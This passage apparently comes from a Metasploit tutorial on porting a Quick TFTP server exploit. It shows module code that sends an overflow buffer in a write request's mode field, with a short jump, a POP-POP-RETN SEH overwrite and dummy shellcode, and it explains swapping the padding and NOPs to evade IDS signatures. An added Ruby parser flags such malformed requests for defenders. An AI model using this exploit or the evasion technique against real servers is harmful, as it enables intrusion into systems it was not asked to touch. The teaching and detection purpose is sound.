Porting Exploits to the Metasploit Framework
    sploit = "\x00\x02"      # TFTP opcode 2: write request (WRQ)
    sploit << "pwnd"         # filename field
    sploit << "\x00"         # NUL that terminates the filename
    sploit << evil           # overflow buffer sent where the mode string belongs
    sploit << "\x00"         # NUL that terminates the mode field
    udp_sock.put(sploit)     # send the datagram to the TFTP server
    disconnect_udp
  end
Following the initial string of As (1019 of them, represented by \x41 in hexadecimal), we add a short jump to overwrite the Next SE Handler (NSEH). At the beginning of this chapter, we used a simple stack overflow example when we attacked MailCarrier and overwrote the instruction pointer. Here, we overwrite the SEH and the NSEH to break out of the structured exception handler. Then we add the address of a POP-POP-RETN sequence of instructions to overwrite SEH, which puts us into an area of memory that we control.
Next, to make sure that the packet will be recognized as a write request by the TFTP server, we add the two-byte write-request opcode \x00\x02 to the packet that is built after the shellcode in the listing.
Now, when we load the module and run it against our target, our debugger
should pause with a SEH overwrite, as shown in Figure 15-4.
Figure 15-4: Quick TFTP's initial SEH overwrite
Because that long string of As and the NOP slide sent to the application will set off IDS alarms, we’ll replace the As (as in the previous example) with a random selection of uppercase alphabetic characters, and replace the \x90 characters with NOP equivalents, as shown in the following boldface code:
    evil = rand_text_alpha_upper(1019)  # Was: "\x41" * 1019
    evil << "\xeb\x08\x90\x90"          # Short Jump
    evil << "\x58\x14\xd3\x74"          # pop/pop/ret
    evil << make_nops(16)               # Was: "\x90" * 16 # NOP slide
    evil << "\xcc" * 412                # Dummy Shellcode
As always, it’s a good idea to check your new module’s functionality after
every change. As you can see in Figure 15-5, the random characters have been
accepted by the application and SEH is still controlled as it was before.
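The same packet layout seen from the defender's side, as an added example that is not part of the book's module: a small Ruby parser for TFTP read/write requests that flags a request by what the protocol allows (the mode field must be netascii, octet or mail, and both string fields are short) rather than by the byte pattern, so swapping the As for random uppercase letters, as the module above does, changes nothing. The packets, the 128-byte field limit and the helper names are constructed for this example.

```ruby
# Added example (not from the book). Parse TFTP RRQ/WRQ packets and report
# findings that do not depend on a byte signature such as a run of "A"s.
TFTP_OPCODES = { 1 => "RRQ", 2 => "WRQ" }.freeze
VALID_MODES  = %w[netascii octet mail].freeze

# Split a request into opcode, filename, mode and any trailing bytes.
# Returns nil when the packet is not a well-formed read/write request.
def parse_tftp_request(pkt)
  return nil if pkt.bytesize < 4
  opcode = pkt.byteslice(0, 2).unpack1("n")
  return nil unless TFTP_OPCODES.key?(opcode)
  body = pkt.byteslice(2, pkt.bytesize - 2)
  filename, mode, rest = body.split("\x00", 3)
  # Both string fields must be present and NUL-terminated (rest may be "").
  return nil if filename.nil? || mode.nil? || rest.nil?
  { opcode: TFTP_OPCODES[opcode], filename: filename, mode: mode, trailing: rest }
end

# Returns a list of reasons the request looks hostile; empty means clean.
# max_field is a constructed policy limit, generous for real file names.
def tftp_findings(pkt, max_field = 128)
  req = parse_tftp_request(pkt)
  return ["malformed request"] if req.nil?
  findings = []
  unless VALID_MODES.include?(req[:mode].downcase)
    findings << "mode is not netascii/octet/mail (#{req[:mode].bytesize} bytes)"
  end
  findings << "mode exceeds #{max_field} bytes" if req[:mode].bytesize > max_field
  findings << "filename exceeds #{max_field} bytes" if req[:filename].bytesize > max_field
  findings << "#{req[:trailing].bytesize} trailing bytes after mode" unless req[:trailing].empty?
  findings
end

# Constructed sample builder using the layout from the listing:
# opcode | filename | NUL | mode | NUL
def build_wrq(filename, mode)
  "\x00\x02".b + filename.b + "\x00".b + mode.b + "\x00".b
end

BENIGN_WRQ = build_wrq("config.bin", "octet")
# 1455 random uppercase letters in the mode field: the same size as the
# padding, jump, address, NOPs and dummy shellcode in the listing, and the
# same evasion substitution, yet it is still flagged twice.
OVERSIZED_WRQ = build_wrq("pwnd", Array.new(1455) { ("A".."Z").to_a.sample }.join)
```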